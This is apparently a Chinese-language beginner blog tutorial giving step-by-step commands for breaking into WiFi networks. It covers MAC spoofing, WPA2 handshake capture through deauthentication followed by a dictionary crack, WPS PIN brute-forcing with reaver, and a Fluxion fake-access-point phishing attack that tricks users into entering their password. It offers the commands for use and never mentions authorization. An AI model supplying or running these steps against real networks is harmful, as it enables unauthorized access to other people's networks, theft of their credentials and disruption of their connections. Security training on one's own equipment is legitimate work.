【無線安全實踐入門】破解WiFi密碼的多個方法

本文希望可以幫助到想要學習接觸此方面、或興趣使然的你，讓你有個大概的印象.
文中可能存在錯誤操作或錯誤理解，望大家不吝指正.

!閱前須知!
本文是基於我幾年前的一本筆記本，上面記錄了我學習網路基礎時的部分筆記
本文中的工具可能已經過時，或者使用方法已經改變了，感興趣可以深入查閱資料.
(但是我還是列出以前的使用方法供大家借鑑).

ps.若對無線攻擊手段與ARP欺騙感興趣可以參考以下兩篇文章
【無線安全實踐入門】基礎攻擊手段與常用工具簡介
【無線安全實踐入門】網路掃描和ARP欺騙

ps.
本文環境在Kali下，學習最好具備一點linux基礎知識.
本文中的'混雜模式'並不是所有網路卡都支援，詳請搜尋支援網路卡型號.
本文第一節和第二節的方法受限於硬體配置等因素，破解時間過長也是合理的.

1.Aircrack-ng套件

非常優秀的無線網路分析套件，功能強大.
許多安全軟體套件都預設(新增/呼叫)此套件來完成操作.

--首先，先要切換到能夠支援'混雜模式'的網路卡(一般都是購買USB無線網路卡)
--開啟混雜模式(開啟之後，網路卡名可能會改變)
> ifconfig (網路卡名) down
> iwconfig (網路卡名) mode monitor
> ifconfig (網路卡名) up

1.1.連線MAC地址繫結的wifi

--檢視附件網路中的wifi，並觀察其詳細資訊(channel、BSSID(MAC)等)
> airodump-ng (網路卡名)

--得知詳細資訊後，可以停止檢視(ctrl+c)
--開始拿有效的mac地址資訊(儘量等久點，包多點)
> airodump-ng -c (通道channel) --bssid (BSSID(MAC) (網路卡名)

--拿到有效mac地址(不要拿到路由器的mac)
--修改本機mac
> ifconfig (網路卡名) down
> macchanger -m (MAC地址) (網路卡名)
> ifconfig (網路卡名) up

--注意，此方法拿到有效mac地址，並未拿到wifi密碼

1.2.WPA2加密的wifi

--檢視附件網路中的wifi，並觀察其詳細資訊(channel、BSSID(MAC)等)
> airodump-ng (網路卡名)

--得知詳細資訊後，可以停止檢視(ctrl+c)
--開始進行檢視route與client的mac地址，[-w]選項的意思就是write
> airodump-ng -w wpa -c (通道channel) --bssid (BSSID(MAC) (網路卡名) --ignore-negative-one

--檢視route與client的mac地址
--開始獲得握手包.cap
> airoplay-ng --deauth 10 -a (route的mac) -c (client的mac) (網路卡名) --ignore-negative-one

--對握手包.cap進行破解
aircrack-ng -w (指定字典) (cap握手包名)

--字典可以自己製作(Crunch工具)，也可以在網上下載大神的字典
--一個NB的字典，對你的破解!事半功倍!

1.3.WEP加密的wifi

--由於這種加密基本已經捨棄了，所以就不說了

2.路由器的PIN碼破解

通過輸入PIN碼來連線wifi也是可以的，PIN碼的破解也是一種不錯的方法.
常見的工具有reaver、minidwep-gtk等工具，這裡我就說下reaver工具.

--首先，先要切換到能夠支援'混雜模式'的網路卡(一般都是購買USB無線網路卡)
--開啟混雜模式(開啟之後，網路卡名可能會改變)
> ifconfig (網路卡名) down
> iwconfig (網路卡名) mode monitor
> ifconfig (網路卡名) up

--選做:可以嘗試掃描是否有啟用WPS的wifi
--Wash工具就是一款針對'判斷wifi是否啟用WPS'的工具

--檢視附件網路中的wifi，並觀察PWR值小於70的來破解(記錄BSSID，記住要是路由器的)
> airodump-ng (網路卡名)

--開始進行破解(注意是路由器的MAC地址，PIN碼是針對路由器的)
> reaver -i (網路卡名) -b (路由器MAC地址) -a -S -vv

--1.如果出現 warning fail to associate ...
--則說明破解失敗(失敗原因包括物件路由器未開啟WPS等)
--2.提示給出了 PIN碼 或 PIN碼和PSK金鑰(wifi密碼)
--則說明破解成功(記錄PIN碼)/(使用PSK金鑰直接嘗試連線wifi)

--選做:可以嘗試得到wifi密碼(PIN碼是可以連wifi)
reaver -i (網路卡名) -b (路由器MAC地址) -p (剛得到的PIN碼)

3.Fluxion工具(推薦)

一個非常不錯的社工破解wifi神器.

與前面操作思路不同.
它是通過模擬原有wifi(FakeAP)，使用者進行連線
然後wifi會斷開網路，並向連線使用者傳送請求(瀏覽器跳轉頁面)，請求輸入原wifi密碼
使用者在收到請求後，只需輸入正確密碼，wifi就會恢復網路，而你獲得wifi密碼
注意，Fluxion會自動判斷wifi密碼是否正確，從而做出下一步操作
ps.此方法的好處就是不用耗費資源去破解密碼.

ps.Fluxion執行時需要呼叫許多其它工具，部分工具可能需要另行下載(執行時會提示有哪些未下載)

--執行軟體(在軟體目錄下)
> ./fluxion

> 網路卡(選擇網路卡)
> channels(選擇所有通道)
> 掃描wifi(掃描到需要的結果時，按ctrl+c)
> 選擇wifi(輸入1、2、3等選擇)
--建立一個假AP
> 選擇攻擊方式(選FakeAP-Hostapd...)
> 選擇儲存路徑(可空格跳過，則儲存在桌面/root/Desktop/)
--會自動出現視窗
> 握手包選擇(aircrack-ng...)
--抓包分配包
> 資料包分配(Deauth all)

--若是以上步驟正確完成，等抓包抓完，會出現選擇
> 選擇web interface
> 選擇語言(提示使用者輸入密碼時的介面語言)

--等待使用者連線上網，在瀏覽器輸入正確密碼(工具會自動驗證密碼是否正確)，工具就會自動停止
--獲得wifi正確密碼

破解wifi可以說是比較有意思、並且有挑戰性的一塊知識點了，
更多的無線攻防操作，其實都是建立在連入區域網的前提之下的.

加油，共勉